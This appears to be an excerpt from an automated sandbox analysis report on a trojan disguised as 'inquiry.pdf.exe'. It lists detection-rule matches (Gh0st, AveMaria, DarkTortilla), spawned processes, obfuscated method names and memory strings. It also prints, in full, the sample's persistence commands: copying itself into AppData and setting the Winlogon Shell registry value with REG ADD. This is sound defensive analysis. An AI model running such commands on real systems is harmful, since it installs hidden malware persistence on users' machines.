Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 0_2_00E38218 0_2_00E38218
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 0_2_00E34518 0_2_00E34518
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 0_2_00E38840 0_2_00E38840
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 0_2_00E36B00 0_2_00E36B00
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 0_2_00E3BD40 0_2_00E3BD40
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_01248218 18_2_01248218
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_01244518 18_2_01244518
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_01248840 18_2_01248840
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_01246B00 18_2_01246B00
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_0124F618 18_2_0124F618
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_0298A240 18_2_0298A240
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02984048 18_2_02984048
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02984700 18_2_02984700
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02988B61 18_2_02988B61
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029828E0 18_2_029828E0
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029849D1 18_2_029849D1
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02987E20 18_2_02987E20
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02988019 18_2_02988019
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02980039 18_2_02980039
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02984039 18_2_02984039
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02980040 18_2_02980040
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029846F0 18_2_029846F0
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02986799 18_2_02986799
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029867A0 18_2_029867A0
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029885D8 18_2_029885D8
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029885C8 18_2_029885C8
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02988B90 18_2_02988B90
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02982B80 18_2_02982B80
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02982B70 18_2_02982B70
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029828CF 18_2_029828CF
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02983210 18_2_02983210
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02983200 18_2_02983200
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02983878 18_2_02983878
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02983868 18_2_02983868
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02987E10 18_2_02987E10
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02987DD1 18_2_02987DD1
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_05112C90 18_2_05112C90
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_051105F0 18_2_051105F0
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_05110040 18_2_05110040
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02989CA8 CreateProcessAsUserW, 18_2_02989CA8
Sample file is different than original file name gathered from version info
Source: inquiry.pdf.exe, 00000000.00000000.244002427.0000000000B3A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamewagl.exeD vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.327749606.0000000002F43000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.313574266.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.328318734.0000000003A75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevfdgghyyyzd.dll8 vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.330587369.0000000006070000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamevfdgghyyyzd.dll8 vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.319901193.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
Source: inquiry.pdf.exe Binary or memory string: OriginalFilenamewagl.exeD vs inquiry.pdf.exe
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe 2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
Source: inquiry.pdf.exe ReversingLabs: Detection: 39%
Source: inquiry.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\inquiry.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\inquiry.pdf.exe C:\Users\user\Desktop\inquiry.pdf.exe
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\glonkjhg.exe C:\Users\user\AppData\Roaming\glonkjhg.exe
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe, Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe," Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\glonkjhg.exe C:\Users\user\AppData\Roaming\glonkjhg.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\inquiry.pdf.exe.log Jump to behavior
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.txt Jump to behavior
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winEXE@29/9@7/3
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.dr Binary or memory string: Select * FROM BillingTable WHERE Billing_ID LIKE @search OR Guest_ID LIKE @search OR Booking_ID LIKE @search OR Payment_Status LIKE @search;
Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.dr Binary or memory string: UPDATE RoomTable SET Room_Status = @booked WHERE Room_Number LIKE @room;
Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.dr Binary or memory string: UPDATE RoomTable SET Room_Status = @unbooked WHERE Room_Number LIKE @room;
Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.dr Binary or memory string: Select * FROM BookingTable WHERE Guest_ID LIKE @search OR Booking_ID LIKE @search OR Room_ID LIKE @search OR Status LIKE @search;
Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.dr Binary or memory string: SELECT Guest_ID FROM GuestTable WHERE Guest_ID NOT IN(SELECT Guest_ID FROM BookingTable WHERE Status = 'Active');
Source: inquiry.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\inquiry.pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: inquiry.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: inquiry.pdf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected DarkTortilla Crypter
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b9a2b2.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c6b362.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d7a30a.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3ca925a.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.520061729.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327749606.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.316384133.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.319901193.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.325693472.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: inquiry.pdf.exe PID: 5896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: glonkjhg.exe PID: 4760, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_0124D18F push dword ptr [ebp+ecx-75h]; retf 18_2_0124D19A
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_0124D238 push dword ptr [ebp+ebx-75h]; iretd 18_2_0124D205
Binary contains a suspicious time stamp
Source: jhFFFffkl.exe.18.dr Static PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]
Source: inquiry.pdf.exe, Ao3y8/f0F3R.cs High entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
Source: 0.0.inquiry.pdf.exe.a90000.0.unpack, Ao3y8/f0F3R.cs High entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
Source: glonkjhg.exe.13.dr, Ao3y8/f0F3R.cs High entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
Source: jhFFFffkl.exe.18.dr, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.cs High entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
Source: jhFFFffkl.exe.18.dr, Astronotplart/gabKErPURPS76kDKjrme.cs High entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
Source: jhFFFffkl.exe.18.dr, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.cs High entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
Source: jhFFFffkl.exe.18.dr, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.cs High entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
Source: jhFFFffkl.exe.18.dr, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.cs High entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.cs High entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/gabKErPURPS76kDKjrme.cs High entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.cs High entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
